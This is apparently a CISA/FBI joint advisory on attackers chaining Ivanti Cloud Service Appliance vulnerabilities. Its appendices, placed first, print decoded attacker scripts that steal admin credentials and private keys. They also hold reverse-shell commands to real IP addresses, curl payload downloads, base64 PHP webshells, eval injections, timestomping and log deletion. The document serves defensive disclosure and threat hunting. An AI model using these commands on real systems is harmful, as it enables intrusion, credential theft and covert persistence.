import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)   os.system(“tar zxvf {}”.format(r))   while True:       for f in os.listdir(‘.’):           if re.match(“phpw{6}”, f):               os.chmod(f, 0o777)               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()               if m:                   set_msg(dbpwd, “PASSWORD”, m)                   time.sleep(30)                   set_msg(dbpwd)                   exit()else:   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)

{import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’,lockoutalert=0,attempts=0 where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
with open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]
   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip()   v = p.split(‘:’)   k = os.popen(‘base 64 -w0 root/.certs/{}.key’.format(v[1])).read()   set_msg(dbpwd, “PASSWORD”, p+’||’+k)   time.sleep(30)   set_msg(dbpwd)}

{import os, re, base64, time
def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’,lockoutalert=0 where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
os.chdir(“/tmp”)d = “/backups”try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]   os.system(”’export PGPASSWORD={};echo “delete from user_info where runas=’Nobody'”|psql -d brokerdb -U gsbadmin”’.format(dbpwd))   if r:       p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)       os.system(“tar zxvf {}”.format(r))       while True:           for f in os.listdir(‘.’):               if re.match(“phpw{6}”, f):                   os.chmod(f, 0o777)                   m = os.popen(“./{} ‘{}’ ‘{}’ ‘{}’ root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()                   if m:                       set_msg(dbpwd, “PASSWORD”, m)                       time.sleep(30)                       set_msg(dbpwd)                       exit()   else:       set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)}

{import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]   os.system(”’export PGPASSWORD={};echo “delete from user_info where runas=’Nobody'”|psql -d brokerdb -U gsbadmin”’.format(dbpwd))if r:   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)   os.system(“tar zxvf {}”.format(r))   while True:       for f in os.listdir(‘.’):           if re.match(“phpw{6}”, f):               os.chmod(f, 0o777)               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()               if m:                   set_msg(dbpwd, “PASSWORD”, m)                   time.sleep(30)                   set_msg(dbpwd)                   exit()else:   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)}

Decoded datetime.php ‘timezone’ Exploit base64 Scripts

{Sep  5 01:09:59 REDACTED gsb[996]: /etc/php.inirewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“phpw{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)}

{Sep  5 01:47:01 REDACTED gsb[2599]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“phpw{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)  | /usr/bin/base64 -d | python;’ (1)}

{Sep  5 02:14:08 REDACTED gsb[1273]: /etc/php.inirewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“phpw{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)}

{Sep  5 22:22:06 REDACTED gsb[9367]: /etc/php.inirewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“phpw{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)}

{Sep  6 02:39:11 REDACTED gsb[21266]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“phpw{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)  | /usr/bin/base64 -d | python;’ (1)}

{Sep  6 03:03:44 REDACTED gsb[11427]: /etc/php.inirewritten with new timezone: ‘;bash /tmp/Xa27efd2.tmp;’ (1)}

{Sep  8 05:18:35 REDACTED gsb[5132]: /etc/php.inirewritten with new timezone: ‘;/sbin/backuptool –backup;’ (1)}

{Sep  8 05:19:34 REDACTED gsb[5325]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“phpw{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)   | /usr/bin/base64 -d | python;’ (1)}

{Sep  8 10:37:35 REDACTED gsb[6196]: /etc/php.inirewritten with new timezone: ‘;nc REDACTED80 -ssl -e /bin/bash;’ (1)}

{Sep  8 10:40:38 REDACTED gsb[8758]: /etc/php.inirewritten with new timezone: ‘;curl https://gggg.oyr2ohrm.eyes.sh/;’ (1)}

{Sep  8 10:41:35 REDACTED gsb[7475]: /etc/php.inirewritten with new timezone: ‘;curl 98.98.54.209/a.sh -o /dev/shm/a.sh;’ (1)}

{Sep  8 13:10:37 REDACTED gsb[22555]: /etc/php.inirewritten with new timezone: ‘;nc REDACTED80 --ssl -e /bin/bash;’ (1)}

{Sep  8 13:21:06 REDACTED gsb[24954]: /etc/php.inirewritten with new timezone: ‘;nc REDACTED80 --ssl -e /bin/bash;’ (1)}

{Sep  8 20:23:14 REDACTED gsb[1899]: /etc/php.inirewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“phpw{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)   | /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)}

{Sep 10 04:36:30 REDACTED gsb[16012]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo python -c ‘import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“45.33.101.53”,443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)’== | /usr/bin/base64 -d | /bin/bash;’ (1)}

{Sep 10 11:48:32 csa gsb[6829]: /etc/php.inirewritten with new timezone: ‘;/bin/python -c ‘importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“156.234.193.18”,44345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’;’ (1)}

{Sep 10 05:33:42 REDACTED gsb[17292]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, timeos.chdir(“/tmp”)d = “/backups/backup-09-01-2024_010101.tar.gz”with open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if os.path.exists(d):  os.system(“tar zxf {}”.format(d))  pwd = os.popen(“export PGPASSWORD={};echo SELECT username,passwd FROM user_info | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().strip()  p = pwd.split(‘:’)  k = os.popen(“cat root/.certs/{}.0″.format(p[1])).read().strip()  os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (1, ‘{}’, ‘1’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, k[0:200], k[200:700]))  os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (2, ‘{}’, ‘2’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, k[700:900], k[900:]))  os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (3, ‘{}’, ‘3’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, pwd[0:200], pwd[200:700]))  time.sleep(60)  os.system(”’export PGPASSWORD={};echo “DELETE FROM blockedcerts”|psql -d brokerdb -U gsbadmin”’.format(dbpwd))  os.system(“rm -rdf *;rm -rf *”)== | /usr/bin/base64 -d | python;’ (1)}

Appendix B: Sudo Commands
See Table 14 for a list of known sudo commands executed by the threat actors.

Command
Use

sudo:  nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/opt/landesk/ldms/LDClient/ldpclient -i ;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo [...] | /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;

Updates the “organization” field of the “admin” account in the PGSQL database with a Python script decoded from base64.
The Python script decompresses the latest backup of the PGSQL database and extracts the password for the gsbadmin account to access the database.

nobody : user NOT in sudoers ; TTY=unknown ; PWD=/usr/bin ; USER=root ; COMMAND=/sbin/setenforce 0
Temporarily disables SELinux.

sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo REDACTED_BASE64_PASSWORD | base64 >/opt/landesk/broker/webroot/gsb/site.cnf
Exfiltrates credentials and places them in a site.cnf webfile.

sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo PD9waHAgZXZhbCgkX1BPU1RbImNiNzg2OGM0NjAzNTQ4NTdiNzE5MjA0ZTI3NjZlZGJlIl0pOw== | base64 -d >/opt/landesk/broker/webroot/gsb/view.php
Creates a webshell at view.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/tripwire --update ;/usr/bin/echo ZWNobyAiPD9waHAgc3lzdGVtKCcvYmluL3N1ZG8gJy4GqFwkX1JFUVVFU1RbJ2EnXSk7IiA+IC9vcHQvbGFuZGVzay9icm9rZXIvd2Vicm9vdC9nc2IvaGVscC5waHA= | /usr/bin/base64 -d | /bin/bash;

Creates a webshell at help.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/setPhpTimeZone($TIMEZONE)/// setPhpTimeZone()/g’ /opt/landesk/broker/webroot/gsb/DateTimeTab.php
Comments out the function setPhpTimeZone in DateTimeTab.php that logs the full exploit command.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/setSystemTimeZone( $TIMEZONE )/// setSystemTimeZone( $TIMEZONE )/g’ /opt/landesk/broker/webroot/gsb/DateTimeTab.php
Comments out the vulnerable function setSystemTimeZone in DateTimeTab.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/GSB main page/GSB main pageneval($_POST[“in39112cnnpkyc1os01q34gp6r60akgi”]);/g’ /opt/landesk/broker/webroot/client/index.php
Adds a webshell into index.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/$canvas_height = 600;/$canvas_height = 600;nteval($_POST[“in39112cnnpkyc1os01q34gp6r60akgi”]);/’ /opt/landesk/broker/webroot/gsb/style.php
Adds a webshell into style.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/client/index.php
Timestomping attempt to change the access and modification times of index.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/style.php
Timestomping attempt to change the access and modification times of style.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/DateTimeTab.php
Timestomping attempt to change the access and modification time of DateTimeTab.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/help.php
Timestomping attempt to change the access and modification times of help.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /var/log/messages
Removes evidence.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/site.cnf
Removes site.cnf file (exfiltrated credentials).

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/client/client.php
Removes one of the original webshells.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/view.php

Removes one of the original webshells. 

Note: The CVEs in this advisory are unrelated to vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in Ivanti’s Connect Secure, Policy Secure and ZTA Gateways. For more information on mitigating CVE-2025-0282 and CVE-2025-0283, see Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways.

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory in response to exploitation in September 2024 of vulnerabilities in Ivanti Cloud Service Appliances (CSA): CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities.

According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. The actors’ primary exploit paths were two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380 and the other exploited CVE-2024-8963 and CVE-2024-9379. In one confirmed compromise, the actors moved laterally to two servers.

All four vulnerabilities affect Ivanti CSA version 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below; according to Ivanti, these CVEs have not been exploited in version 5.0.[1]

Ivanti CSA 4.6 is End-of-Life (EOL) and no longer receives patches or third-party libraries. CISA and FBI strongly encourage network administrators to upgrade to the latest supported version of Ivanti CSA. Network defenders are encouraged to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory. Credentials and sensitive data stored within the affected Ivanti appliances should be considered compromised. Organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.

For a downloadable copy of IOCs, see:

  • AA25-022A STIX XML (XML, 105.56 KB)
  • AA25-022A STIX JSON (JSON, 76.91 KB)

Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

In September 2024, Ivanti released two Security Advisories disclosing exploitation of CVE-2024-8190 and CVE-2024-8963.[2][3] In October 2024, Ivanti released another advisory disclosing exploitation of CVE-2024-9379 and CVE-2024-9380.[1]

  • CVE-2024-8963 [CWE-22: Path Traversal] is an administrative bypass vulnerability that allows threat actors to remotely access restricted features within the appliance. When used in conjunction with CVE-2024-8190 [CWE-78: OS Command Injection], threat actors can remotely authenticate into a victim’s network and execute arbitrary commands on the appliance [T1219].[2][3]
  • CVE-2024-9379 [CWE-89: SQL Injection] allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.[1]
  • CVE-2024-9380 [CWE-77: Command Injection] allows a remote authenticated attacker with admin privileges to obtain RCE.[1]

According to Ivanti’s advisories and industry reporting, these vulnerabilities were exploited as zero days.[4] Based on evidence of active exploitation, CISA added CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 to its Known Exploited Vulnerabilities (KEV) Catalog.

According to CISA and trusted third-party incident response data, threat actors chained the above listed vulnerabilities to gain initial access, conduct RCE, obtain credentials, and implant webshells on victim networks. The primary exploit paths included two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380. The other chain exploited CVE-2024-8963 and CVE-2024-9379. After exploitation, the actors moved laterally in one victim—other victims had no follow-on activity because they identified anomalous activity and implemented mitigation measures.

Exploit Chain 1

The threat actors leveraged CVE-2024-8963 in conjunction with remote code execution vulnerabilities, CVE-2024-8190 and CVE-2024-9380. Acting as a nobody user [T1564.002], the threat actors first sent a GET request to datetime.php to acquire session and cross-site request forgery (CSRF) tokens using GET /client/index.php%3F.php/gsb/datetime[.]php [T1071.001]. They followed this in quick succession with a POST request to the same endpoint, using the TIMEZONE input field to manipulate the setSystemTimeZone function and execute code. In some confirmed compromises, the actors used this method to run base64-encoded Python scripts that harvested encrypted admin credentials from the database [T1552.001]. Note: The actors used multiple script variations. See Appendix A for examples of encoded and decoded scripts.

In some cases, the threat actors exfiltrated the encrypted admin credentials, then decrypted them offline [TA0010]. In other cases, the threat actors leveraged an executable matching the regular expression php\w{6}, located in the /tmp directory, to decrypt the credentials prior to exfiltration—this tool was unrecoverable.

After obtaining credentials, the actors logged in and exploited CVE-2024-9380 to execute commands from a higher privileged account. The actors successfully sent a GET request to /gsb/reports[.]php. They immediately followed this with a POST request using the TW_ID input field to execute code to implant webshells for persistence [T1505.003].

In one confirmed compromise, the threat actors tried to create webshells using two different paths:

  • echo "<?php system(@
    $_REQUEST['a']);">/opt/ivanti/csa/broker/webroot/client/help.php
  • echo "<?php system('/bin/sudo '. @
    $_REQUEST['a']);" > /opt/landesk/broker/webroot/gsb/help.php

In the same compromise, the actors used the exploit to execute the following script to create a reverse Transmission Control Protocol command and control (C2) channel: bash -i >&/dev/tcp/107.173.89[.]16/8000 0>&1.

